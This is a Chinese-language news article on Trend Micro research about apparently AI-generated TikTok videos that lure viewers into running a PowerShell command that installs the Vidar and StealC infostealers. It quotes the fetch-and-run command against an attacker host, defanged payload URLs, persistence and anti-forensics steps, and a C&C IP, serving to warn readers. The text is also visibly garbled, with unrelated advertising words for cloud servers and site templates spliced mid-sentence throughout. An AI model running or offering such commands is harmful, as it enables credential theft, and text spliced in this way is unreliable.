AI 生成恶意软件:TikTok 视频通过 PowerShell 命令传播信息窃取程序

  发布时间:2025-12-07 19:54:18   作者:玩站小弟   我要评论
趋势科技Trend Micro)最新研究揭露,TikTok平台正出现一种新型威胁:AI生成的视频诱骗用户执行恶意PowerShell命令,使其暴露在强大的信息窃取恶意软件风险之下。导致Vidar和St 。

趋势科技(Trend Micro)最新研究揭露  ,生成视频TikTok平台正出现一种新型威胁 :AI生成的恶意视频诱骗用户执行恶意PowerShell命令,使其暴露在强大的软件信息窃取恶意软件风险之下 。

导致Vidar和StealC恶意软件的通过感染链条 | 图片来源 :Trend Micro

社交工程攻击新手法

趋势科技近期曝光了一起危险的社交工程攻击活动,黑客利用TikTok的云计算命令病毒式传播平台分发Vidar和StealC——两种复杂的信息窃取恶意软件家族 。网络犯罪分子通过AI生成内容和利用用户信任,传播程序将看似无害的信息视频教程转变为恶意软件传播载体 。

报告指出:"这类攻击使用视频(可能由AI生成)诱导用户执行PowerShell命令 ,生成视频这些命令被伪装成软件激活步骤 。恶意"

攻击传播机制

攻击始于@gitallowed 、模板下载软件@zane.houghton和@sysglow.wow等TikTok账号分享的通过匿名教程视频 ,指导观众激活Windows 、命令Spotify或CapCut等软件 。传播程序部分视频播放量超过50万次,信息展示的生成视频"激活"步骤最终会引导用户执行如下PowerShell命令:

复制iex (irm hxxps://allaivo[.]me/spotify)1.

趋势科技强调:"视频指示观众运行一系列命令...指导语音也疑似AI生成,进一步表明攻击者使用AI工具制作这些视频。服务器租用"

该命令会下载并执行远程脚本 ,启动一个兼具隐蔽性和持久性的恶意软件投放链 。

攻击流程详解用户观看TikTok视频后直接执行PowerShell命令从hxxps://allaivo[.]me/spotify下载并运行远程脚本在APPDATA和LOCALAPPDATA创建隐藏目录,并添加到Windows Defender排除列表下载二级有效载荷——通常是从hxxps://amssh[.]co/file.exe获取的Vidar或StealC从hxxps://amssh[.]co/script.ps1获取最终持久化脚本  ,使恶意软件能在系统重启后继续运行删除日志和临时文件夹以掩盖取证证据

趋势科技警告称 :"脚本采用重试逻辑确保有效载荷成功下载  ,亿华云然后以隐藏的提升权限进程启动恶意软件可执行文件 。"

新型C&C通信技术

恶意软件激活后,会使用新型规避技术与命令控制(C&C)服务器通信:

Vidar利用Steam和Telegram等平台作为Dead Drop Resolvers(DDR,死投解析器)  ,将真实服务器地址隐藏在个人资料元数据中StealC直接连接基于IP的终端(如91[.]92[.]46[.]70)

研究人员指出 :"Vidar尤其滥用Steam和Telegram等合法服务作为死投解析器 。"

AI驱动的建站模板恶意软件新时代

TikTok算法放大效应与AI生成欺骗手段的结合,标志着恶意软件传播进入新时代。正如趋势科技强调:"AI生成内容的使用,使这类攻击从孤立事件升级为高度可扩展的运营活动 。"

香港云服务器
  • Tag:

相关文章

  • Veeam调查发现:勒索软件阻碍了数字化转型和IT现代化

    大多数83%)的IT领导者认为,他们需要的系统恢复速度与现实恢复速度之间存在“可用性方面的差距”。与此同时,有81%的IT领导者认为,在他们能够承受的数据丢失量与数据保护频率之间存在“保护上的差距”。
    2025-12-07
  • 双重勒索软件攻击的危险

    最近,双重勒索软件攻击对他们的目标使用了两种不同的勒索软件变体,攻击者使用的勒索软件包括AvosLocker、Diamond、Hive、Karakurt、LockBit、Quantum和Royal。联
    2025-12-07
  • 维护云安全的优秀实践

    随着越来越多的企业将其运营转移到云环境,保护云数据库是必要的。通过实施以下措施,组织可以保护其敏感数据、降低数据泄露风险并加强云安全态势:集成身份访问管理 (IAM) 解决方案和零信任方法是增强云安全
    2025-12-07
  • 保护设备免受网络威胁的六大物联网安全提示

    保护物联网(IoT)设备对于保护个人数据和维护网络的完整性至关重要。物联网安全措施是否足够强大以抵御潜在的网络威胁?如果没有,那么是时候提高物联网安全性以更好地保护设备了。数据显示,物联网设备网络攻击
    2025-12-07
  • 如何使用Hashicorp工具创建安全的边缘基础设施

    译者 | 李睿审校 | 重楼​本文解释了如何使用HashiCorp的堆栈构建一个安全的平台;许多步骤都有良好的文档记录。我们将详细强调最关键的部分,解释在哪里发现问题以及如何解决问题,并在官方教程中保
    2025-12-07
  • 如何用ChatGPT分析恶意软件

    译者 | 陈峻审校 | 重楼自从我们进入数字化时代以来,恶意软件就一直是计算机应用系统的“心腹大患”。事实上,每一次技术进步都会为恶意行为者提供更多的工具,使得他们的攻击行为更具破坏性。不过,如今生成
    2025-12-07

最新评论